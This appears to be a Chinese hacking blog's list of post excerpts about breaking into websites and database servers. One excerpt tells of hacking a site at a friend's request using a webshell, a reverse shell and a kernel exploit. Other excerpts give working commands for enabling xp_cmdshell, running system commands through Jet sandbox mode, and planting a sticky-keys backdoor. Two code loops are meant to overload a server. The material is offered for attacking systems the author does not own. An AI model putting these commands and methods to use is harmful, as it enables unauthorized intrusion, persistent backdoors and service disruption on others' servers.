天黑再动手

摘要： 刚上qq，一朋友叫我搞个网站。闲着无事打开一看是dz的，我手里没有0day只好旁注了。发现一站有ewebeditor的php版，登录后台添加了样式加上php，结果上传php马不成功。后来通过网站的说明文件才知道ewebeditor后台的样式只有abc管用，老规矩搞到一shell。拿到shell一看是linux的，想着先跨站。shell浏览目标站不行，命令行下输入ls -la /www.users/目标站/ 也不行。连接mysql，想out个shell到目标站也失败了。没办好，只好溢出了。上传1.pl反弹个shell到cmd。uname -r查看版本，2.6.18的，马上想到udev，试了不行。 阅读全文

摘要： 前段时间我朋友给我一个sopo的软件，说是扫1433口令的，而且猜解速度很快，我就找个服务器试了试，确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。（有人可能会说了，这有啥好研究的，sa的权限直接加用户到超管不就成了吗.其实在sa权限下还是有很多的问题的 大家可以捡有用的看 没用的就略过吧）下面来说sa下执行命令错误的几种情况：1、 无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)这种情况比较常见的，修复起来说简单也简单，但是有条件的。这种情况要是能列出目录（用sqltools v2.0就有列目录功能）恭喜你这 阅读全文

摘要： 不知道各位。在上传的时候。 有没需要过。一个上传。 不修改名字。。然后上传目录已经被程序所定义了。然而。上传目录取消了脚本执行的权限。 我想这里估计大家都要放弃了。如何突破呢?其实是可以的. 关键是 [不修改名字]先来看看一个上传的数据包:POST /fa-bu/upload/upfile1.asp HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-pow 阅读全文

摘要： sql2005恢复xp_cmdshellEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;零、----------------- 添加SA用户----------- 阅读全文

摘要： 今日遇到一个问题，提权成功 用户加入了 administrators Remote Desktop Users 两个组，3389登录提示有问题相信有少部分朋友遇到过这种问题，而我是第一次遇到现在以经解决首先，我是建立了SHIFT后门进去以后在如下操作处理办法:1. "控制面板" --> "管理工具" --> "终端服务配置"2. 点击"连接", 右边出现连接项(例如: RDP-Tcp,tcp,Microsoft RDP 5.2)3. 双击要修改的连接项。3. 弹出窗口, 单击"权限" 阅读全文

摘要： 以下方法都以需要SA权限为前提。1, 沙盒模式的变通.原始方法:第一句开启沙盘模式：exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1第二句利用jet.oledb执行系统命令：select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\dnary.mdb',&# 阅读全文

摘要： <%for i = 1 to 100i = 10next%>保存为 *.asp，然后访问该文件，cpu速度上升，然后管理员来重启DB-OWNER权限让服务器重启 sql命令:while 1<9 begin select char(0) end 阅读全文